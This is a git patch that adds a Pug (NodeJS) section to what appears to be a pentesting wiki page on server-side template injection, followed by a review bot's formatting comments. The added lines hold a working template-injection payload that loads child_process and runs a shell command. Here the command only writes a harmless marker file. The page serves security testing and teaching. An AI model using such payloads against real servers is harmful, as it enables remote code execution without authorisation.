From c08b86f73bd232c5a180c0118171c1052e99cbfe Mon Sep 17 00:00:00 2001 From: LGR <30753137+looCiprian@users.noreply.github.com> Date: Sat, 9 Jan 2021 11:15:51 +0100 Subject: [PATCH] Added PugJs SSTI --- pentesting-web/ssti-server-side-template-injection.md | 9 +++++++++ 1 file changed, 9 insertions(+) diff --git a/pentesting-web/ssti-server-side-template-injection.md b/pentesting-web/ssti-server-side-template-injection.md index 97b6a4d7..a90cbe72 100644 --- a/pentesting-web/ssti-server-side-template-injection.md +++ b/pentesting-web/ssti-server-side-template-injection.md @@ -247,6 +247,15 @@ wrtz%7b%7b%23%77%69%74%68%20%22%73%22%20%61%73%20%7c%73%74%72%69%6e%67%7c%7d%7d% * [https://appcheck-ng.com/template-injection-jsrender-jsviews/](https://appcheck-ng.com/template-injection-jsrender-jsviews/) +### PugJj \(NodeJS\) + +* #{7*7} = 49 +* #{function(){localLoad=global.process.mainModule.constructor._load;sh=localLoad("child_process").exec('touch /tmp/pwned.txt')}()} + +#### More information + +* [https://licenciaparahackear.github.io/en/posts/bypassing-a-restrictive-js-sandbox/](https://licenciaparahackear.github.io/en/posts/bypassing-a-restrictive-js-sandbox/) + ### ERB \(Ruby\) * `{{7*7}} = {{7*7}}`
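Review bot: The new heading `### PugJj \(NodeJS\)` is misspelled; the subject line calls it PugJs, so the heading should match and stay searchable in the page. The two added bullets are also bare text, unlike the ERB context line just below (`{{7*7}} = {{7*7}}`), which is wrapped in a code span. Without backticks, Markdown can consume the `*` in `#{7*7}` and the `_` in `_load` as emphasis markers, so a reader copying from the rendered page gets something different from what was committed. Wrap both bullets in code spans. A short sentence before the second bullet would also help: say that it reaches `child_process` through `global.process.mainModule.constructor._load` and that `touch /tmp/pwned.txt` is only a harmless marker of command execution, so the entry documents what it demonstrates rather than relying on the link under "More information".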